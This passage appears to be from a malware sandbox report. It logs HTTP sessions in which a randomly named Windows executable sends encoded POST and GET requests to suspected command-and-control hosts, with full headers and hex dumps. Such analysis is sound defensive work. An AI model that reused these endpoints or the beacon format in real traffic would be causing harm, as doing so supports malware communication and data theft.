                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Jul 9, 2024 12:10:22.168358088 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                      Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                      Jul 9, 2024 12:10:22.168391943 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                      Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                      Jul 9, 2024 12:10:22.168430090 CEST672INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                      Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                      Jul 9, 2024 12:10:22.168463945 CEST1236INData Raw: 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c
                                                      Data Ascii: 1676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="
                                                      Jul 9, 2024 12:10:22.168581009 CEST1236INData Raw: 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d
                                                      Data Ascii: 11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
                                                      Jul 9, 2024 12:10:22.168613911 CEST1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                      Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.9435
                                                      Jul 9, 2024 12:10:22.168648958 CEST672INData Raw: 39 35 35 34 30 37 2c 32 30 2e 31 34 32 31 38 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30
                                                      Data Ascii: 955407,20.14218 -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.2
                                                      Jul 9, 2024 12:10:22.168808937 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                      Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                      Jul 9, 2024 12:10:22.168839931 CEST224INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                      Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4
                                                      Jul 9, 2024 12:10:22.173526049 CEST1236INData Raw: 2e 36 37 31 35 37 31 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31
                                                      Data Ascii: .6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.0015747


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.9497485.252.229.221805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:27.367615938 CEST838OUTPOST /3ooi/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.tp-consulting.net
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.tp-consulting.net
                                                      Referer: http://www.tp-consulting.net/3ooi/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 34 4a 74 78 53 64 48 46 61 2b 4f 59 4e 48 52 6e 61 76 4a 6e 31 57 46 36 53 39 73 77 63 34 4d 64 74 6f 4b 57 68 56 34 63 71 64 46 45 31 4b 32 68 38 6f 4a 34 72 36 47 52 45 66 67 48 4f 74 32 65 59 6a 75 36 75 31 33 66 66 4b 74 66 46 32 2f 67 42 37 70 79 37 52 39 78 55 57 68 4c 31 75 62 35 53 4c 64 39 33 2b 6d 6a 72 44 33 47 46 76 6a 30 44 79 2f 6a 34 2f 4a 6d 2f 30 48 4b 36 45 31 63 4b 70 73 2b 2f 78 41 50 78 4e 6d 2f 59 35 66 75 67 4d 47 2b 73 6b 53 6b 35 73 36 2f 59 66 4f 78 61 38 72 47 39 53 63 6e 56 74 52 79 43 47 4c 48 4e 54 71 42 37 6c 4b 6e 32 7a 6d 4d
                                                      Data Ascii: lv-=4JtxSdHFa+OYNHRnavJn1WF6S9swc4MdtoKWhV4cqdFE1K2h8oJ4r6GREfgHOt2eYju6u13ffKtfF2/gB7py7R9xUWhL1ub5SLd93+mjrD3GFvj0Dy/j4/Jm/0HK6E1cKps+/xAPxNm/Y5fugMG+skSk5s6/YfOxa8rG9ScnVtRyCGLHNTqB7lKn2zmM


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.9497495.252.229.221805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:29.937726974 CEST862OUTPOST /3ooi/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.tp-consulting.net
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.tp-consulting.net
                                                      Referer: http://www.tp-consulting.net/3ooi/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 34 4a 74 78 53 64 48 46 61 2b 4f 59 4c 6d 68 6e 57 6f 6c 6e 7a 32 46 31 4d 74 73 77 4a 6f 4d 5a 74 6f 57 57 68 55 4e 5a 71 75 68 45 30 72 47 68 39 74 70 34 6f 36 47 52 63 76 67 43 45 4e 32 42 59 6a 6a 5a 75 78 7a 66 66 4b 70 66 46 79 37 67 41 49 78 31 37 42 39 7a 4d 6d 68 4e 37 4f 62 35 53 4c 64 39 33 2b 69 64 72 44 66 47 46 65 54 30 46 57 4c 67 37 2f 4a 70 34 30 48 4b 74 55 31 59 4b 70 74 4f 2f 77 63 78 78 4f 65 2f 59 39 58 75 68 5a 7a 6f 6c 6b 54 4f 6e 73 37 58 65 4f 76 74 56 2f 6e 7a 39 52 6c 47 48 73 63 52 49 48 72 5a 63 68 6a 61 75 79 4b 41 78 55 76 6b 59 6f 49 53 37 77 43 37 4a 30 67 39 76 4a 78 73 44 76 73 54 39 67 3d 3d
                                                      Data Ascii: lv-=4JtxSdHFa+OYLmhnWolnz2F1MtswJoMZtoWWhUNZquhE0rGh9tp4o6GRcvgCEN2BYjjZuxzffKpfFy7gAIx17B9zMmhN7Ob5SLd93+idrDfGFeT0FWLg7/Jp40HKtU1YKptO/wcxxOe/Y9XuhZzolkTOns7XeOvtV/nz9RlGHscRIHrZchjauyKAxUvkYoIS7wC7J0g9vJxsDvsT9g==
                                                      Jul 9, 2024 12:10:30.593400955 CEST360INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:30 GMT
                                                      Server: Apache
                                                      Content-Length: 196
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.9497505.252.229.221805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:32.518081903 CEST1875OUTPOST /3ooi/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.tp-consulting.net
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.tp-consulting.net
                                                      Referer: http://www.tp-consulting.net/3ooi/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 34 4a 74 78 53 64 48 46 61 2b 4f 59 4c 6d 68 6e 57 6f 6c 6e 7a 32 46 31 4d 74 73 77 4a 6f 4d 5a 74 6f 57 57 68 55 4e 5a 71 75 70 45 31 5a 4f 68 38 4c 68 34 70 36 47 52 43 66 67 44 45 4e 32 4d 59 67 54 46 75 78 2f 50 66 50 31 66 45 52 6a 67 48 35 78 31 78 42 39 7a 46 47 68 49 31 75 61 39 53 50 35 35 33 2b 79 64 72 44 66 47 46 64 4c 30 43 43 2f 67 33 66 4a 6d 2f 30 48 47 36 45 31 67 4b 70 6b 32 2f 77 70 45 78 65 2b 2f 59 63 72 75 6d 76 66 6f 71 6b 53 6f 69 73 37 50 65 4f 6a 45 56 2f 37 42 39 52 67 6a 48 74 6f 52 49 78 71 6b 4d 54 33 63 31 77 65 43 36 7a 7a 50 65 74 35 32 2b 42 71 34 53 46 34 4c 6f 59 78 35 50 73 35 38 73 5a 36 4c 66 47 2b 6f 2b 61 32 56 67 48 73 6a 67 4d 66 50 49 63 73 4f 2f 36 6b 2f 4a 75 41 47 51 63 65 62 55 61 7a 34 36 70 72 42 2f 4f 36 69 49 6c 6f 73 36 4b 39 78 50 57 54 34 4f 79 34 43 51 6d 76 4e 72 42 65 49 50 41 45 73 53 2f 68 70 41 57 65 4c 4b 4c 6f 71 69 31 69 6e 4c 6f 32 64 34 65 39 47 79 5a 36 2b 43 45 46 35 38 42 79 4f 42 30 7a 6b 64 6c 52 6b 49 72 62 5a 49 77 [TRUNCATED]
                                                      Data Ascii: lv-=4JtxSdHFa+OYLmhnWolnz2F1MtswJoMZtoWWhUNZqupE1ZOh8Lh4p6GRCfgDEN2MYgTFux/PfP1fERjgH5x1xB9zFGhI1ua9SP553+ydrDfGFdL0CC/g3fJm/0HG6E1gKpk2/wpExe+/YcrumvfoqkSois7PeOjEV/7B9RgjHtoRIxqkMT3c1weC6zzPet52+Bq4SF4LoYx5Ps58sZ6LfG+o+a2VgHsjgMfPIcsO/6k/JuAGQcebUaz46prB/O6iIlos6K9xPWT4Oy4CQmvNrBeIPAEsS/hpAWeLKLoqi1inLo2d4e9GyZ6+CEF58ByOB0zkdlRkIrbZIwxEHBWGxarPrErK46n/aRiF3Okr5GDPNVc59EqtbbfTJpnPzxzL3q4srbO0MkIN2dZuUKLZ/Fa0fyxl+8+v7cqy7sth/FJUR2tk1h6yGmzLUPDsoLf8ZdMAwkOAgHkdNMX+TSt8TENnsLNQGk/CBNxJ6+5+NediR/EuoMiWykVVSRCVfHRPFSq+/VjZNyoEQUJGxg/diLJvJOPQ4+Fc2m0TrsuH6zlfzEUT4cJcOCM6PlcbYIfM0TvlIyOahyhygWO2CEPbuncmiHZ3fGlg3brfFZx88SPZRffRdur9441+EtshcMsISJFcuvmf/gDEtDDLhVah+1iC6RJ1l7wBW76EWo7mgqmegmESCGAED9lqts5e8nGvmi/PfjgvVhBSDI2Qy42u2vvHus3RREEyPBJExMWteDqvU44uJBsQM8gDMawf875VnQxSXC3cujNGAOXLNTeUTmblIm7qHgo02XOA0HZQ83tBiQmaeszkjWAdDYaSKyx9/AGd14fFyvqGorcv6XXRa2JaDqXbkIvmuRtA5+TBjUYUImwB2hq9AEz+s9Z/QyTZ7ipuAw2UQPLiz3HMvI09jkFJBIJT+Fy+n5b3Jt7EKVqLdYUncJbVXfzy2BmKLN1KBPljdSB6e+zFoW0gzcogsMQ4xU6FOFmnjkMcSS1M8DE0PTCp [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.9497515.252.229.221805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:35.094050884 CEST569OUTGET /3ooi/?lv-=1LFRRoLbVcSYXTZ6XdBa3kkSOtIcXt0xuK7G7zAfyuAyg5iI4oE5vIWxJ/ECDOK7eTrBqgzuJv49CznNGJBB0jFuKD1kyeaZBLZ0jvvkrC/dFa2PYg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.tp-consulting.net
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:35.748955965 CEST360INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:35 GMT
                                                      Server: Apache
                                                      Content-Length: 196
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.949752142.250.185.147805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:40.838975906 CEST847OUTPOST /93w6/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.lexpaidshares.online
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.lexpaidshares.online
                                                      Referer: http://www.lexpaidshares.online/93w6/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 59 39 43 56 47 72 7a 41 47 69 65 50 34 32 2b 38 49 2b 72 6c 36 39 34 48 58 71 4e 50 53 53 4e 4f 2f 48 31 48 6b 78 69 74 75 4e 39 77 66 37 66 6f 76 31 47 68 39 31 78 56 71 57 46 51 4a 35 4d 50 6b 74 4f 53 4b 71 6b 64 38 51 73 45 48 53 4e 54 51 50 59 45 65 6b 6c 72 7a 4f 6e 78 6d 38 62 39 71 43 4c 65 6f 6d 62 6c 31 67 5a 42 2f 62 41 4f 6f 70 72 39 5a 70 30 37 58 38 72 64 76 55 50 42 55 46 2b 7a 76 76 61 56 59 70 71 53 71 4d 6f 37 31 77 37 36 4b 41 7a 51 4f 39 64 75 46 39 52 44 75 49 54 31 4a 74 2b 63 70 2b 54 75 72 75 79 5a 44 55 69 43 42 69 5a 79 73 4c 63 30
                                                      Data Ascii: lv-=Y9CVGrzAGieP42+8I+rl694HXqNPSSNO/H1HkxituN9wf7fov1Gh91xVqWFQJ5MPktOSKqkd8QsEHSNTQPYEeklrzOnxm8b9qCLeombl1gZB/bAOopr9Zp07X8rdvUPBUF+zvvaVYpqSqMo71w76KAzQO9duF9RDuIT1Jt+cp+TuruyZDUiCBiZysLc0
                                                      Jul 9, 2024 12:10:41.589036942 CEST410INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:41 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.949753142.250.185.147805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:43.430684090 CEST871OUTPOST /93w6/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.lexpaidshares.online
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.lexpaidshares.online
                                                      Referer: http://www.lexpaidshares.online/93w6/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 59 39 43 56 47 72 7a 41 47 69 65 50 37 57 69 38 4b 64 44 6c 72 4e 34 49 5a 4b 4e 50 4a 43 4e 4b 2f 48 35 48 6b 77 57 48 75 2f 70 77 65 61 76 6f 75 30 47 68 2b 31 78 56 34 32 46 56 57 70 4d 45 6b 74 43 61 4b 71 6f 64 38 52 49 45 48 54 39 54 51 38 77 4c 50 6b 6c 54 2f 75 6e 76 72 63 62 39 71 43 4c 65 6f 6d 6e 4c 31 67 42 42 2f 72 77 4f 71 4e 2f 2b 66 5a 30 34 41 4d 72 64 35 6b 50 46 55 46 2b 52 76 71 37 77 59 72 53 53 71 4e 59 37 31 46 58 35 44 41 79 36 4b 39 63 6c 41 34 6b 32 70 37 44 54 48 64 53 67 33 74 33 57 68 76 53 48 53 6d 72 5a 55 31 5a 56 72 73 56 63 68 41 52 56 70 4f 59 38 6d 6a 4e 76 6e 4f 48 44 70 62 48 73 52 51 3d 3d
                                                      Data Ascii: lv-=Y9CVGrzAGieP7Wi8KdDlrN4IZKNPJCNK/H5HkwWHu/pweavou0Gh+1xV42FVWpMEktCaKqod8RIEHT9TQ8wLPklT/unvrcb9qCLeomnL1gBB/rwOqN/+fZ04AMrd5kPFUF+Rvq7wYrSSqNY71FX5DAy6K9clA4k2p7DTHdSg3t3WhvSHSmrZU1ZVrsVchARVpOY8mjNvnOHDpbHsRQ==
                                                      Jul 9, 2024 12:10:44.154918909 CEST410INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:44 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.949754142.250.185.147805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:46.092117071 CEST1884OUTPOST /93w6/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.lexpaidshares.online
                                                      Content-Length: 1228
